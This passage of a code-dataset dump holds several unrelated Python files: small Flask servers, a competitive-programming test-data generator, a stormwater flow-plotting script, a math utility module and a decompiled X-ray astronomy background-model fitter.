mimetype='multipart/x-mixed-replace; boundary=frame')\n\nif __name__==\"__main__\":\n app.run(debug=True)","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"307757364","text":"#!/usr/bin/env python\n\nfrom cyaron import * # 引入CYaRon的库\n\nfor i in range(11, 21): # 即在[1, 4)范围内循环,也就是从1到3\n test_data = IO(file_prefix=\"T19272\", data_id=i) # 生成 heat[1|2|3].in/out 三组测试数据\n\n n = randint(3,100000) \n tree=Graph.tree(n);\n test_data.input_writeln(n)\n for edge in tree.iterate_edges():\n test_data.input_writeln(edge.start,edge.end)\n for j in range(1, n+1): \n test_data.input_write(randint(1,1000))\n print(i)\n test_data.output_gen(\"T19853.exe\")\n \n","sub_path":"2018-1-9/T19853.py","file_name":"T19853.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"387474424","text":"from flask import Flask, render_template, url_for, abort, request\nfrom queue_model import *\nimport logging\nimport os\nimport time\n\nconfig = configparser.ConfigParser()\nconfig.read(\"config.ini\")\nport = config['Server']['port']\ndebug = config['Server']['debug'].strip() == 'True'\nname = config['Server']['name']\n\napp = Flask(name)\n\n@app.route('/')\ndef index():\n s = QueueModel.select()\n return render_template('index.html', Camera1=s[0].id, Camera2=s[1].id, Camera3=s[3].id,\n Number1=s[0].number_of_people, Number2=s[1].number_of_people,\n Number3=s[3].number_of_people)\n\n#Возвратит кол-во людей в данной очереди\n@app.route('/home/PeopleNumber/', methods=['GET'])\ndef getNearshop(number):\n for i in QueueModel.select():\n if number == i.id:\n amount = i.number_of_people\n\n return(f\"В данной очереди в настоящий момент находится {amount} человек\")\n\nif __name__ == '__main__':\n app.run(port=port, debug=debug, host='0.0.0.0')","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"443145376","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 12 14:37:28 2020\n\n@author: alex.messina\n\"\"\"\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport matplotlib as mpl\nimport datetime as dt\nimport numpy as np\nimport os\n#from Rating_curve import *\n## Set Pandas display options\npd.set_option('display.large_repr', 'truncate')\npd.set_option('display.width', 180)\npd.set_option('display.max_rows', 40)\npd.set_option('display.max_columns', 13)\nplt.ion()\n\n## Set Storm start and end\nstorm_start = dt.datetime(2021,3,10,0,0)\nstorm_end = dt.datetime(2021,3,12,23)\n\nuse_recorded_flow = True\n#use_recorded_flow = False\n\ncfs = ['ViaRancho','DELDIOS', 'FELICITA', 'KITCARSON','GREENVALLEY', 'MOONSONG','CLOVERDALE','GUEJITO','SYCAMORE','SDGCRK']\ngpm = ['ElKu','Tazon','Oceans11','Lomica']\n\n#### INDIVIDUAL SITES\n#creeks\nsite_list = ['DELDIOS']\n#site_list = ['FELICITA']\n#site_list = ['KITCARSON']\n#site_list = ['CLOVERDALE']\n#site_list = ['GUEJITO']\n#site_list = ['SDGCRK']\n#site_list = ['MOONSONG']\n#site_list = ['GREENVALLEY']\n#site_list = ['SYCAMORE']\n#outfalls\nsite_list = ['ElKu']\n#site_list = ['ViaRancho']\n#site_list = ['Tazon']\n#site_list = ['Oceans11']\n#site_list = ['Lomica']\n\n\n\n## CREEKS\n#site_list = ['DELDIOS', 'FELICITA', 'KITCARSON','GREENVALLEY', 'MOONSONG','CLOVERDALE','GUEJITO','SYCAMORE','SDGCRK']\n\n## OUTFALLS\n#site_list = ['ElKu','ViaRancho','Tazon','Oceans11','Lomica']\n\n\nfor site in site_list:\n print (site)\n #datadir = 'C:/Users/alex.messina/Documents/GitHub/Sutron_scripts/Data Download/Log backup 5_11_2020/'\n datadir = 'C:/Users/alex.messina/Documents/LinkComm/Log Files/'\n df = pd.DataFrame()\n \n ## Time Series Data\n for fname in [f for f in os.listdir(datadir) if site in f and 'loggrp' in f]:\n print (fname)\n df_ind = pd.read_csv(datadir+fname,index_col=0,header=0,skiprows=[1])\n \n ## Rename flow data column\n if site in gpm:\n flow_units = 'gpm'\n print ('Rename PT Flow to Flow_gpm')\n df_ind = df_ind.rename(columns={'PT Flow':'Flow_gpm','Flow _PT':'Flow_gpm','Flow_PT':'Flow_gpm'})\n if site in cfs:\n flow_units = 'cfs'\n print ('Rename PT Flow to Flow_cfs')\n df_ind = df_ind.rename(columns={'PT Flow':'Flow_cfs','Flow _PT':'Flow_cfs','Flow_PT':'Flow_cfs'}) \n ## Rename Level\n df_ind = df_ind.rename(columns={'PT Level':'Level_PT'}) \n \n if site=='GREENVALLEY':\n df_ind = df_ind.rename(columns={'PT North':'Level_PT_No', 'PT South':'Level_PT_So'}) \n \n \n ## Rename other stuff\n df_ind = df_ind.rename(columns={'Aliquot_Num':'AliquotNum','Curr_pacing':'SamplePacin','FlowVolume':'Incr_Flow'})\n \n ## Combine date and time\n if 'Time' in df_ind.columns:\n df_ind.index = pd.to_datetime(df_ind.index +' '+ df_ind['Time']) \n df_ind.index = pd.to_datetime(df_ind.index)\n ## append to df\n df = df.append(df_ind)#,sort=True)\n \n ##format df\n # Replace error values == -99999\n df = df.replace(-99999,np.nan)\n df = df.replace(-99,np.nan)\n # ensure datetime index and drop duplicates\n df.index = pd.to_datetime(df.index)\n df['Datetime'] = df.index\n df = df.drop_duplicates(subset='Datetime')\n \n # Interpolate battery level\n if 'Battery_950' in df.columns:\n df['Battery_950'] = df['Battery_950'].interpolate('linear',axis=0,limit = 13)\n \n # Interpolate data to fill gap\n for col in ['Level_950','Vel_950','Flow_950']:\n if col in df:\n df[col] = df[col].interpolate('linear',axis=0,limit=3)\n \n if site == 'Tazon':\n df['Flow_gpm'] = df['Flow_950']\n df['Level_PT'] = df['Level_950']\n\n# df['PT Level'].plot()\n \n ## Alarm Data\n events = pd.DataFrame()\n for fname in [f for f in os.listdir(datadir) if site in f and 'events' in f]:\n print (fname)\n df_events = pd.read_csv(datadir+fname,index_col=0,header=0,skiprows=[1])\n if 'Time' in df_ind.columns:\n df_events.index = pd.to_datetime(df_events.index +' '+ df_devents['Time'])\n ## append to df\n events = events.append(df_events,sort=True)\n # ensure datetime index and drop duplicates\n events.index = pd.to_datetime(events.index)\n events['Datetime'] = events.index\n events = events.drop_duplicates(subset='Datetime') \n \n ## Event df's\n ## Aliquots\n aliquots = events[events['Label']=='Triggered S'][['Label','Value']]\n manual_grabs = events[events['Label']=='Trigger Man'][['Label','Value']]\n if site in gpm:\n aliquots['Flow_gpm'] = df['Flow_gpm']\n if site in cfs:\n aliquots['Flow_cfs'] = df['Flow_cfs']\n aliquots = aliquots.dropna()\n aliquots['Datetime'] = aliquots.index \n aliquots['Time between aliquots'] = aliquots['Datetime'].diff()\n aliquots = aliquots.drop('Datetime',1)\n aliquots = aliquots.rename(columns={'Value':'Aliquot#'}) \n aliquots['Aliquot#'] = aliquots['Aliquot#'].astype(int)\n \n \n ## Alarms\n alarm_in = events[events['Label']=='Alarm In'][['Label','Value']]\n alarm_out = events[events['Label']=='Alarm Out'][['Label','Value']]\n ## Bottle changes\n bottle_change = events[events['Label']=='BottleChang'][['Label','Value']]\n\n ## \n ## now resample to 5Min \n# df = df.resample('1Min')#.mean() \n \n \n##%% RECALCULATE FLOWS\n if use_recorded_flow == False:\n ## Rating Curve\n rating_curves = pd.ExcelFile(datadir+'Current_RatingCurves.xlsx')\n rating_curve = rating_curves.parse(sheetname=site,skiprows=1,header=0)\n rating_curve = rating_curve.round(2)\n rating_curve.index = rating_curve['Stage (in)']\n ## From rating curve\n if site == 'GREENVALLEY':\n df['Flow_north_cfs'] = pd.DataFrame(df['Level_PT_No'].apply(lambda x: rating_table(rating_curve,float(x))),columns=['Level_PT_No'])\n df['Flow_south_cfs'] = pd.DataFrame(df['Level_PT_So'].apply(lambda x: rating_table(rating_curve,float(x))),columns=['Level_PT_So'])\n df['Flow_cfs'] = df['Flow_north_cfs'] + df['Flow_south_cfs']\n else:\n df['Flow_cfs'] = pd.DataFrame(level['Result'].apply(lambda x: rating_table(rating_curve,float(x))),columns=['Result'])\n \n#%% PLOT\n fig, ax1 = plt.subplots(1,1,figsize=(16,8))\n fig.suptitle(site,fontsize=14,fontweight='bold')\n \n ## Water Level\n if site=='GREENVALLEY':\n ax1.plot_date(df.index,df['Level_PT_No'],ls='-',marker='None',c='r',label='Water Level from PT North')\n ax1.plot_date(df.index,df['Level_PT_So'],ls='-',marker='None',c='g',label='Water Level from PT South')\n ax1.set_ylim(0, df['Level_PT_No'].max()*1.25)\n else:\n ax1.plot_date(df.index,df['Level_PT'],ls='-',marker='None',c='r',label='Water Level from PT')\n ax1.set_ylim(0, df['Level_PT'].max()*1.25)\n ax1.set_ylabel('Water Level (inches)',color='r',fontsize=14,fontweight='bold')\n ax1.spines['left'].set_color('r')\n ax1.tick_params(axis='y',colors='r',labelsize=14)\n ax1.xaxis.set_major_formatter(mpl.dates.DateFormatter('%A \\n %m/%d/%y %H:%M'))\n \n ## Flow\n ax2 = ax1.twinx()\n if site=='GREENVALLEY' and use_recorded_flow==False:\n print ('GREEN VALLEY recalculated flows')\n ax2.plot_date(df.index,df['Flow_north_cfs'] ,ls='-',marker='None',c='teal',label='Flow from HvF (north)')\n ax2.plot_date(df.index,df['Flow_south_cfs'] ,ls='-',marker='None',c='b',alpha=0.6,label='Flow from HvF (south)')\n ax2.plot_date(df.index,df['Flow_cfs'],ls='-',marker='None',c='b',label='Flow from HvF (Total)')\n else:\n if site in cfs:\n ax2.plot_date(df.index,df['Flow_cfs'],ls='-',marker='None',c='b',label='Flow from HvF')\n ax2.set_ylabel('Flow (cfs)',color='b',fontsize=14,fontweight='bold')\n ## Plot Aliquots\n if len(aliquots) >0:\n ax2.plot_date(aliquots.index,aliquots['Flow_cfs'],ls='None',marker='o',c='k',label='Aliquots')\n for al in aliquots.iterrows():\n #print (al)\n al_num = \"%.0f\"%al[1]['Aliquot#']\n ax2.annotate(al_num,xy=(pd.to_datetime(al[0]),al[1]['Flow_cfs']*1.05),ha='center')\n \n if site in gpm:\n ax2.plot_date(df.index,df['Flow_gpm'],ls='-',marker='None',c='b',label='Flow from HvF')\n ax2.set_ylabel('Flow (gpm)',color='b',fontsize=14,fontweight='bold')\n ax2.set_ylim(0, df['Flow_gpm'].max()*1.1)\n ## Plot Aliquots\n if len(aliquots) >0:\n ax2.plot_date(aliquots.index,aliquots['Flow_gpm'],ls='None',marker='o',c='k',label='Aliquots')\n for al in aliquots.iterrows():\n #print (al)\n al_num = \"%.0f\"%al[1]['Aliquot#']\n ax2.annotate(al_num,xy=(pd.to_datetime(al[0]),al[1]['Flow_gpm']*1.05),ha='center')\n ax2.xaxis.set_major_formatter(mpl.dates.DateFormatter('%A \\n %m/%d/%y %H:%M')) \n # Plot Bottle Changes\n for b_chng in bottle_change.iterrows():\n ax1.axvline(b_chng[0],label='Bottle: '+\"%.0f\"%b_chng[1]['Value'],c='grey',alpha=0.6)\n ax1.annotate('^ Bottle '+\"%.0f\"%b_chng[1]['Value']+' ^',xy=(b_chng[0],5),ha='left',rotation=-90)\n\n ## FMT \n ax2.spines['right'].set_color('b')\n ax2.tick_params(axis='y',colors='b',labelsize=14)\n \n ax1.legend(fontsize=14,ncol=1,loc='upper left')\n ax2.legend(fontsize=14,loc='upper right')\n \n plt.tight_layout()\n plt.subplots_adjust(top=0.95)\n \n ## Zoom to storm\n ax1.set_xlim(storm_start,storm_end)\n if site == 'GREENVALLEY':\n ax1.set_ylim(0, df.loc[storm_start:storm_end,'Level_PT_No'].max()*1.25)\n else:\n ax1.set_ylim(0, df.loc[storm_start:storm_end,'Level_PT'].max()*1.25)\n ax2.set_ylim(0, df.loc[storm_start:storm_end,'Flow_'+flow_units].max()*1.1)\n \n print (aliquots[storm_start:storm_end])\n print ('Minimum time between aliquots: '+ str(aliquots.loc[storm_start:storm_end,'Time between aliquots'].min()))\n \n print ('Peak flow rate: ' + \"%.2f\"%df.loc[storm_start:storm_end,'Flow_'+flow_units].max() + flow_units)\n if site == 'GREENVALLEY':\n print ('Peak stage: ' + \"%.2f\"%df.loc[storm_start:storm_end,'Level_PT_No'].max() + 'inches')\n print ('Peak stage: ' + \"%.2f\"%df.loc[storm_start:storm_end,'Level_PT_So'].max() + 'inches')\n \n else:\n print ('Peak stage: ' + \"%.2f\"%df.loc[storm_start:storm_end,'Level_PT'].max() + 'inches')\n\n\n#%%\nimport mpld3\nhtml_file= open('C:/Users/alex.messina/Documents/GitHub/Sutron_scripts/LakeHodges/Interactive Data Files/'+site+'-flow_data.html',\"w\")\nmpld3.save_html(fig,html_file)\nhtml_file.close()\n\n#%% Scatterplot 950 vs PT LEVEL\n\n#df = df[df.index > dt.datetime(2020,12,26)]\n\nfig,ax = plt.subplots(1,1)\nplt.scatter(df['Level_950'],df['Level_PT'],c='grey',alpha=0.5,label='raw data')\nplt.scatter(df['Level_950'],df['Level_PT']-0.75,c='r',label='-0.75 offset')\nplt.xlabel('Level 950'), plt.ylabel('Level PT')\nplt.xlim(0,18), plt.ylim(0,18)\nplt.plot([0,20],[0,20],ls='--',marker='None',c='grey')\nplt.legend()\n\n\n#%% Scatterplot 950 vs PT FLOW\nfig,ax = plt.subplots(1,1)\nplt.scatter(df['Flow_950'],df['Flow _PT'],c='grey',alpha=0.5)\nplt.scatter(df['Flow_950'],df['Flow _PT'],c='r')\nplt.xlabel('Flow 950'), plt.ylabel('Flow PT')\nplt.xlim(0,18), plt.ylim(0,18)\nplt.plot([0,20],[0,20],ls='--',marker='None',c='grey')\n\n#%% Scatterplot 950 Level Velocity\nfig,ax = plt.subplots(1,1)\nplt.scatter(df['Level_950'],df['Vel_950'],c='r',label='Level_950 vs Vel_950')\nplt.scatter(df['Level_PT'],df['Vel_950'],c='b',label='Level_PT vs Vel_950')\nplt.xlabel('Level 950 and Level_PT'), plt.ylabel('Velocity 950 ')\nplt.xlim(0,18), plt.ylim(0,18)\nplt.plot([0,20],[0,20],ls='--',marker='None',c='grey')\nlegend(loc='upper right')\n\n\n#%% SAVE TO CSV\n# if site == 'GREENVALLEY':\n# df_out = pd.DataFrame({'Level_North_in':level_north['Result'],'Level_South_in':level_south['Result'],'Flow_North_cfs':flow_north['Result'],'Flow_South_cfs':flow_south['Result'],'Flow_cfs':flow['Result']})\n# \n# else:\n# df_out = pd.DataFrame({'Level_in':level['Result'],'Flow_cfs':flow['Result']})\n# df_out = df_out[df_out != -99999.0].dropna()\n# \n# if site == 'SDGCRK':\n# ## just get rid of data prior since it wasn't offset and doesnt matter\n# df_out.ix[:dt.datetime(2020,3,18,8,50)] = np.nan\n# df_out = df_out.dropna()\n# # shift one hour forward to match PDT\n# df_out.ix[:dt.datetime(2020,3,26,15,0)] = df_out.ix[:dt.datetime(2020,3,26,15,0)].set_index(df_out.ix[:dt.datetime(2020,3,26,15,0)].index + dt.timedelta(minutes=60))\n# \n\n \n \n# df_out.to_csv(datadir +'just level and flow/'+ site+'_level_and_flow.csv')\n \n\n\n\n\n\n\n","sub_path":"Data_visualization_2020.py","file_name":"Data_visualization_2020.py","file_ext":"py","file_size_in_byte":12847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"412226932","text":"def bez(x, y): # Коэффииенты Безу\n print('Коэффициенты будут присвоенны переменным k_0 и k_1 соотвественно')\n def GCD(a, b):\n a = int(a)\n b = int(b)\n if b == 0:\n return a\n return GCD(b, a % b)\n def egcd(c, d):\n gcd = GCD(c, d)\n for v in range(10 ** 3):\n for u in range(10 ** 3):\n if v * c + u * d == gcd:\n return v, u, gcd\n if -v * c - u * d == gcd:\n return -v, -u, gcd\n if -v * c + u * d == gcd:\n return -v, u, gcd\n if v * c - u * d == gcd:\n return v, -u, gcd\n return 'ERROR' \n x = int(x)\n y = int(y)\n k = egcd(x, y)\n k_0 = k[0]\n k_1 = k[1]\n\n\n\ndef gcd(a, b): # НОД двух чисел\n a = int(a)\n b = int(b)\n if b == 0:\n return a\n return gcd(b, a % b)\n\n\n\ndef dec(func): # Декоратор\n def wrap(*args, **kwargs):\n res = func(*args, **kwargs)\n return res.upper()\n return wrap\n\n\n \ndef new_base(a, b): #Перевод числа a их 10-ной системы счисления в новую с.ч. b\n if b < 2:\n return \"ERROR\"\n output = \"\"\n while val != 0:\n arg = a % b\n if arg < 10:\n output += chr(arg + ord('0'))\n else:\n output += chr(arg + ord('A') - 10)\n a //= b\n return ''.join(reversed(output))\n\n\n\ndef prime_check(n): #Проверка числа на простоту\n import random\n def gcd(a,b):\n if b == 0:\n return a\n return gcd(b, a % b)\n def rec(b, n):\n if n == 0:\n return 1\n if n % 2 == 0:\n return rec(b*b, n/2)\n else:\n return b*rec(b, n-1)\n def check_ferma(n):\n for i in range(5):\n a = random.randint(1,1000)\n while gcd(a,n)>1 :\n a = random.randint(1,1000)\n if rec(a,n-1)%n != 1 :\n return False\n return True\n return check_ferma(n)\n\n\n\ndef gauss(A): #Метод Гаусса для реения системы линейных уравнений\n A = list(A)\n a = len(A[0])\n b = len(A)\n for k in range(0, a - 1): #По сути выбираем элементы глав. диагонали(те самый, на котрый буем делить)\n for q in range(k + 1, b): #Выбираем столбец, под элементом глав. диагонали, который мы выбрали выше\n for z in range(k, a): #Выбираем строку, начиная с элемента, индекс столбца которого равен индексу элемента на диагонаи\n w = A[q][k] / A[k][k]\n A[q][z] -= w * A[k][z]\n for l in range(b - 1, -1, - 1):\n for t in range(l - 1, -1, - 1):\n p = A[t][l] / A[l][l]\n A[t][a - 1] -= p * A[l][a - 1]\n A[t][l] = 0\n o = [0] * b\n for k in range(0, b): # Функция возваращает массив с решениями системы уравнений \n o[k] = A[k][k]\n return(o)\n\n","sub_path":"my_module.py","file_name":"my_module.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"126276833","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/bxa/sherpa/background/xmm.py\n# Compiled at: 2020-01-28 12:31:59\n# Size of source mod 2**32: 19729 bytes\nfrom __future__ import print_function\nimport os\nfrom sherpa.astro.ui import *\nimport numpy\nprint('\\n\\nUsing XMM empirical background model originally by Richard Sturm.\\nPlease reference Maggi P., et al., 2014, A&A, 561, AA76.\\n\\n')\n\ndef get_embedded_file(filename):\n \"\"\"\n Gets the path of a file in the same folder as this script\n \"\"\"\n return os.path.join(os.path.dirname(__file__), filename)\n\n\ndef get_pn_bkg_model(i, galabs, fit=False):\n if get_rmf(i).energ_lo[0] == 0:\n get_rmf(i).energ_lo[0] = 0.001\n else:\n if get_arf(i).energ_lo[0] == 0:\n get_arf(i).energ_lo[0] = 0.001\n pnbrsp = get_response(i, bkg_id=1)\n pnscale = get_bkg_scale(i)\n dia_pn_rmf = get_embedded_file('pn_dia.rmf')\n dia_pn_arf = get_embedded_file('pn_dia.arf')\n copy_data(i, 1002)\n load_bkg_rmf(1002, dia_pn_rmf)\n load_bkg_arf(1002, dia_pn_arf)\n pnbunitrsp = get_response(1002, bkg_id=1)\n delete_data(1002)\n pncenters = [\n 1.49165, 1.49165, 4.53177, 5.42516, 6.38155, 7.48675, 8.04087, 8.04087, 8.60924, 8.89395, 9.5616]\n pnlinewidth = [0.0573813, 0.0363469, 0.0610487, 0.070838, 0.0959053, 0.0652422, 0.0948594, 6.26174e-05, 0.120893, 0.114254, 0.108717]\n pnlinenorm = [0.00781356, 0.00396601, 0.000730727, 0.000496413, 5.31295e-09, 0.000684796, 0.0301564, 0.000141847, 0.00887887, 0.00575592, 0.00171367]\n pnbkgcons, pnbkgspline1, pnbkgexpdec, pnbkgsmedge1, pnbkgsmedge2, pnbkgspline2, pnbkginspl, pnbkgline1, pnbkgline2, pnbkgline3, pnbkgline4, pnbkgline5, pnbkgline6, pnbkgline7, pnbkgline8, pnbkgline9, pnbkgline10, pnbkgline11, pnbkgpl, pnbkgapec, pnbkglcapec = (\n xsconstant.pncons, xsspline.pnspline1, xsexpdec.pnexpdec, xssmedge.pnsmedge1, xssmedge.pnsmedge2, xsspline.pnspline2, xspowerlaw.pnbkpl, xsgaussian.pngau1, xsgaussian.pngau2, xsgaussian.pngau3, xsgaussian.pngau4, xsgaussian.pngau5, xsgaussian.pngau6, xsgaussian.pngau7, xsgaussian.pngau8, xsgaussian.pngau9, xsgaussian.pngau10, xsgaussian.pngau11, xspowerlaw.pnpnexpl, xsapec.pnapec, xsapec.pnlcapec)\n pnlines = [\n pnbkgline1, pnbkgline2, pnbkgline3, pnbkgline4, pnbkgline5, pnbkgline6, pnbkgline7, pnbkgline8, pnbkgline9, pnbkgline10, pnbkgline11]\n pnfixwid = [\n pnbkgline2, pnbkgline3, pnbkgline4, pnbkgline5, pnbkgline6, pnbkgline8, pnbkgline11]\n pnfree = [pnbkgline1, pnbkgline7, pnbkgline9, pnbkgline10]\n pn_bkg = pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl + pnbkgline1 + pnbkgline2 + pnbkgline3 + pnbkgline4 + pnbkgline5 + pnbkgline6 + pnbkgline7 + pnbkgline8 + pnbkgline9 + pnbkgline10 + pnbkgline11))) + pnbrsp(galabs * (pnbkgpl + pnbkgapec) + pnbkglcapec)\n for l, c in zip(pnlines, pncenters):\n l.LineE = c\n l.LineE.min = c - 0.05\n l.LineE.max = c + 0.05\n\n pnbkgline2.LineE = pnbkgline1.LineE\n pnbkgline8.LineE = pnbkgline7.LineE\n for l, s in zip(pnlines, pnlinewidth):\n l.Sigma = s\n\n for l in pnfree:\n l.Sigma.min = 1e-05\n l.Sigma.max = 0.2\n\n for l in pnfixwid:\n l.Sigma.freeze()\n\n for l, n in zip(pnlines, pnlinenorm):\n l.norm = n\n l.norm.min = 1e-10\n l.norm.max = 10000000000.0\n\n pnbkgcons.factor = 1.0\n pnbkgcons.factor.freeze()\n pnbkgapec.kT = 0.286928\n pnbkgapec.kT.min = 0.008\n pnbkgapec.kT.max = 64\n pnbkgapec.Abundanc = 1.0\n pnbkgapec.Abundanc.freeze()\n pnbkgapec.Redshift = 0.0\n pnbkgapec.Redshift.freeze()\n pnbkgapec.norm = 5.5841e-05\n pnbkgapec.norm.min = 1e-10\n pnbkgapec.norm.max = 10000000000.0\n pnbkglcapec.kT = 0.1\n pnbkglcapec.kT.freeze()\n pnbkglcapec.Abundanc = 1.0\n pnbkglcapec.Abundanc.freeze()\n pnbkglcapec.Redshift = 0.0\n pnbkglcapec.Redshift.freeze()\n pnbkglcapec.norm = 3.89164e-05\n pnbkglcapec.norm.min = 1e-10\n pnbkglcapec.norm.max = 10000000000.0\n pnbkgexpdec.factor = 44.3418\n pnbkgexpdec.factor.min = 0\n pnbkgexpdec.factor.max = 100\n pnbkgexpdec.norm = 6830.89\n pnbkgexpdec.norm.freeze()\n pnbkgsmedge1.edgeE = 0.538408\n pnbkgsmedge1.edgeE.freeze()\n pnbkgsmedge1.MaxTau = 1.40238\n pnbkgsmedge1.MaxTau.min = 0\n pnbkgsmedge1.MaxTau.max = 10\n pnbkgsmedge1.index = -2.67\n pnbkgsmedge1.index.freeze()\n pnbkgsmedge1.width = 0.313365\n pnbkgsmedge1.width.min = 0.01\n pnbkgsmedge1.width.max = 100\n pnbkgsmedge2.edgeE = 1.38826\n pnbkgsmedge2.edgeE.freeze()\n pnbkgsmedge2.MaxTau.min = 0\n pnbkgsmedge2.MaxTau.max = 10\n pnbkgsmedge2.MaxTau = 9.37167\n pnbkgsmedge2.index = -2.67\n pnbkgsmedge2.index.freeze()\n pnbkgsmedge2.width = 5.7642\n pnbkgsmedge2.width.min = 0.01\n pnbkgsmedge2.width.max = 100\n pnbkgspline1.Estart = 0.2\n pnbkgspline1.Estart.freeze()\n pnbkgspline1.Ystart = -1.31506\n pnbkgspline1.Ystart.min = -1000000.0\n pnbkgspline1.Ystart.max = 1000000.0\n pnbkgspline1.Yend = 1064.16\n pnbkgspline1.Yend.min = -1000000.0\n pnbkgspline1.Yend.max = 1000000.0\n pnbkgspline1.YPstart = -106.183\n pnbkgspline1.YPstart.min = -1000000.0\n pnbkgspline1.YPstart.max = 1000000.0\n pnbkgspline1.YPend = -366.092\n pnbkgspline1.YPend.min = -1000000.0\n pnbkgspline1.YPend.max = 1000000.0\n pnbkgspline1.Eend = 1.74715\n pnbkgspline1.Eend.min = 0\n pnbkgspline1.Eend.max = 100\n pnbkgspline2.Estart = 3.29056\n pnbkgspline2.Ystart = 1.00643\n pnbkgspline2.Ystart.min = -1000000.0\n pnbkgspline2.Ystart.max = 1000000.0\n pnbkgspline2.Yend = 0.887026\n pnbkgspline2.Yend.min = -1000000.0\n pnbkgspline2.Yend.max = 1000000.0\n pnbkgspline2.YPstart = -0.278401\n pnbkgspline2.YPstart.min = -1000000.0\n pnbkgspline2.YPstart.max = 1000000.0\n pnbkgspline2.YPend = 0.00484809\n pnbkgspline2.YPend.min = -1000000.0\n pnbkgspline2.YPend.max = 1000000.0\n pnbkgspline2.Eend = 7.32701\n pnbkgspline2.Eend.min = 0\n pnbkgspline2.Eend.max = 100\n pnbkginspl.PhoIndex = 0.279\n pnbkginspl.PhoIndex.min = -2\n pnbkginspl.PhoIndex.max = 9\n pnbkginspl.norm = 0.00823614\n pnbkginspl.norm.min = 1e-10\n pnbkginspl.norm.max = 1000000.0\n pnbkgpl.PhoIndex = 1.46\n pnbkgpl.PhoIndex.freeze()\n pnbkgpl.norm = 1.25288e-05\n pnbkgpl.norm.min = 1e-10\n pnbkgpl.norm.max = 1000.0\n if fit:\n set_bkg_full_model(i, pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl))))\n print('Fitting (1/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl + pnbkgline2))))\n print('Fitting (2/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl + pnbkgline1 + pnbkgline2))))\n print('Fitting (3/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl + pnbkgline1 + pnbkgline2 + pnbkgline7 + pnbkgline8))))\n print('Fitting (4/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl + pnbkgline1 + pnbkgline2 + pnbkgline7 + pnbkgline8 + pnbkgline9 + pnbkgline10))))\n print('Fitting (5/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl + pnbkgline1 + pnbkgline2 + pnbkgline3 + pnbkgline4 + pnbkgline5 + pnbkgline6 + pnbkgline7 + pnbkgline8 + pnbkgline9 + pnbkgline10 + pnbkgline11))))\n print('Fitting (6/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl + pnbkgline1 + pnbkgline2 + pnbkgline3 + pnbkgline4 + pnbkgline5 + pnbkgline6 + pnbkgline7 + pnbkgline8 + pnbkgline9 + pnbkgline10 + pnbkgline11))) + pnbrsp(galabs * pnbkgapec))\n print('Fitting (7/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl + pnbkgline1 + pnbkgline2 + pnbkgline3 + pnbkgline4 + pnbkgline5 + pnbkgline6 + pnbkgline7 + pnbkgline8 + pnbkgline9 + pnbkgline10 + pnbkgline11))) + pnbrsp(galabs * (pnbkgapec + pnbkgpl)))\n print('Fitting (8/8)...')\n fit_bkg(i)\n set_bkg_full_model(i, pnbunitrsp(pnbkgcons * (pnbkgspline1 * pnbkgexpdec + pnbkgsmedge1 * pnbkgsmedge2 * (pnbkgspline2 * pnbkginspl + pnbkgline1 + pnbkgline2 + pnbkgline3 + pnbkgline4 + pnbkgline5 + pnbkgline6 + pnbkgline7 + pnbkgline8 + pnbkgline9 + pnbkgline10 + pnbkgline11))) + pnbrsp(galabs * (pnbkgapec + pnbkgpl) + pnbkglcapec))\n fit_bkg(i)\n freeze(pnbkgcons, pnbkgspline1, pnbkgexpdec, pnbkgsmedge1, pnbkgsmedge2, pnbkgspline2, pnbkginspl, pnbkgline1, pnbkgline2, pnbkgline3, pnbkgline4, pnbkgline5, pnbkgline6, pnbkgline7, pnbkgline8, pnbkgline9, pnbkgline10, pnbkgline11, galabs, pnbkgapec, pnbkgpl, pnbkglcapec)\n print(' ')\n print('PN background model set up and fitted')\n print('Please double-check that it is a good 